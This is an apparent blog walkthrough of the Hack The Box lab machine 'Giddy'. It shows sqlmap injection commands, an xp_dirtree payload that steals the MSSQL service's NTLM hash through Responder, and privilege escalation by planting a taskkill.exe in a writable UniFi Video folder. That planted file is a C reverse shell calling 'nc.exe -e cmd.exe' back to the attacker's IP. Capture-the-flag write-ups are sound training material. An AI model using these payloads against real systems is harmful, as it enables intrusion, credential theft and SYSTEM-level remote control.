HTB – Giddy Walkthrough

nmap

 gobuster

Search field – SQL error

SQL Injection
You can use the cheatsheet of PentestMonkeyhttp://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet
or you can use sqlmap
sqlmap –url https://10.10.10.104/mvc/Product.aspx?ProductSubCategoryId=1 –dbms=mssql –dbs

databases

 current usersqlmap –url https://10.10.10.104/mvc/Product.aspx?ProductSubCategoryId=1 –dbms=mssql –current-user

Capture MSSQL credentials with xp_dirtree, smbserver.py
Following blogspost explains the process very goodhttps://medium.com/@markmotig/how-to-capture-mssql-credentials-with-xp-dirtree-smbserver-py-5c29d852f478
=1; EXEC MASTER.sys.xp_dirtree ‘\\yourIP\something’

listen with responder to steal the user hash
responder -I tun0

Crack NTML hash

/remote Powershell Login

Search for unifivideo on searchsploit

Exploit – Step by Step
Ubiquiti UniFi Video for Windows is installed to “C:\ProgramData\unifi-video\”by default and is also shipped with a service called “Ubiquiti UniFi Video”.

 Its executable “avService.exe” is placed in the same directory and also runs underthe NT AUTHORITY/SYSTEM account.

However the default permissions on the “C:\ProgramData\unifi-video” folder areinherited from “C:\ProgramData” and are not explicitly overridden, which allowsall users, even unprivileged ones, to append and write files to the applicationdirectory:c:\ProgramData>icacls unifi-video

Upon start and stop of the service, it tries to load and execute the file at “C:\ProgramData\unifi-video\taskkill.exe”. However this file does not exist in the application directory by default at all.By copying an arbitrary “taskkill.exe” to “C:\ProgramData\unifi-video\” as an unprivileged user, it is therefore possible to escalate privileges and execute arbitrary code as NT AUTHORITY/SYSTEM.

Even when I encrypt the exploit, an AV probably catches it.

So I used the following C code to get root shell

#include <stdlib.h>int main () {system(“nc.exe -e cmd.exe <myip> <myport>”);return 0;}
# compile the C codei686-w64-mingw32-gcc windows-exp.c -lws2_32 -o exp.exe
Send taskkill.exe and nc.exe over SimpleHTTPServer

Stop the service

Wait for the Admin shell

Leave a comment

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.